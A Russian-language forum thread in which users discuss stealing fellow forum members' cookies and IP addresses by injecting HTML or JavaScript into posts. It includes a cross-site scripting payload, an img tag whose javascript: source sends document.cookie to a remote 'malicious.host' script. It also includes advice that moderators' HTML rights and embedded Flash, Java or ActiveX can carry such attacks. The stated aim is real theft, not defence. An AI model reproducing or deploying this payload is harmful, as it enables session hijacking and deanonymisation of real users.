Увидеть айпишник через куки

dept08

Attila утверждает, что с помощью загрузки javascript на форум можно заполучить куки любого юзера, который логинился в форум. И извлечь оттуда его IP-адрес. Что вы думаете по этому поводу? Предложите примерный алгоритм и код скрипта, как это сделать. Или предложите ссылку, что почитать на эту тему. Или докажите, что форум защищен от этого.

maggi14

если предположить, что ты в сети (гы-гы, ну ты, конечно, не в локалке, но неважно) - то без проблем. Грузишь страницу с локального сервера, передавая обработчику данные.

Dasar

купи хоть раз журнал хакер, и открой для себя удивительный мир web-дырок.

dept08

Можешь расписать идею поподробнее? Какую страницу, с какого сервера и какие данные? Агентуру в локалке найдем.
Можно прислать юзеру ссылку на мой ресурс на апаче-сервере и посмотреть с какого айпишника его открывали, но это что-то не то.

dept08

Читал в молодости. Запомнились советы подложить в гостях в их цветочный горшок химикат, выделяющий H2S при поливе его водой. И совет как в маил.ру в окошко постить кусок скрипта, чтобы воровать пользователей, ту дырку давно закрыли.

feliks28

Шо, таки для любого браузера? %)

Dasar

> И совет как в маил.ру в окошко постить кусок скрипта, чтобы воровать пользователей, ту дырку давно закрыли.
на mail.ru то может и закрыли, а модераторы на forum.local - это до сих пор могут.

Dasar

работа JavaScript-а разве зависит от браузера?

feliks28

А разве нет?

Dasar

в данном случае, это разница не сильно повлияет, особенно если учесть, что для узнавания ip-а можно обойтись , в том числе, и без JavaScript-а.

feliks28

А можно код данного случая?

dept08

Напиши в приват детали реализации. Ты пробовал?

evgen5555

Забыл в сабж "[КРЕАТИВ]" запихнуть.
Исправляйся.

Dasar

<img src="xxx"/>

feliks28

И где тут отсылка куки?

Dasar

так тебе нужен ip или куки?

feliks28

По-моему вполне очевидно что мне нужно

Dasar

>По-моему вполне очевидно что мне нужно



совсем неочевидно, т.к. то говорят, что им cookie нужны, чтобы Ip увидеть, то ip нужен, чтобы cookie увидеть...

feliks28

Ну, я подумал, что раз уж ты начал мне отвечать про реализации JavaScript, то ты понял, что мне нужно не img src

Dasar

дык, через img src можно получить, как cookie, так и ip.

feliks28

Код для отправки куков без js приведешь?
Если нет, то приводи с js работающий для любого(ограничимся чтобы работало для ie, ff, opera) броузера

Dasar

> Код для отправки куков без js приведешь?
делается через вставку Flash-а, Java-апплета, .Net-апплета, ActiveX-апплета.
> Если нет, то приводи с js работающий для любого(ограничимся чтобы работало для ie, ff, opera) броузера
обычного document.cookie - хватает.

evgen5555

<img src="javascript:execScript('e=document.cookie;document.images[1]
.src=\'http://malicious.host.com/shit.pl?ck=\'+e')"></img>


В эксплорере вроде работало.

feliks28

делается через вставку Flash-а, Java-апплета, .Net-апплета, ActiveX-апплета
И как их в этот форум вставить?
обычного document.cookie - хватает.
Возвращаемся к началу: для любого броузера?

feliks28

Я возможно неточно выразился, но подразумевалось, что будет работать во всех трех браузерах, а не в одном из них.

Dasar

>И как их в этот форум вставить?
как html, если есть права модератора
> Возвращаемся к началу: для любого броузера?
для ie, ff и opera с настройками по умолчанию - работает.

feliks28

1.Угу, неплохое такое если
2. Странно, а я всегда думал что отсылка куки удаленному серверу - это дырка специфичная для ie. Видимо я ошибался...
Что ж приношу свои извинения за потраченное на меня время.

Dasar

> 1.Угу, неплохое такое если
да, но есть проблема - модератор на форуме сейчас каждый второй.

morsha

нифига, каждый сотый

Olegis73

да, но есть проблема - модератор на форуме сейчас каждый второй бот йон_бровера
нифига, каждый сотый бот йон_бровера

otets-mihail

>как html, если есть права модератора

к сведению, все посты в формате хтмл скидываются в лог

Dasar

Означает ли это, что этот лог периодически просматривают?

gopnik1994

если форум хакнут, то посмотрят

otets-mihail

ну да, они на мыло сыпятся
Оставить комментарий
Имя или ник:
Комментарий: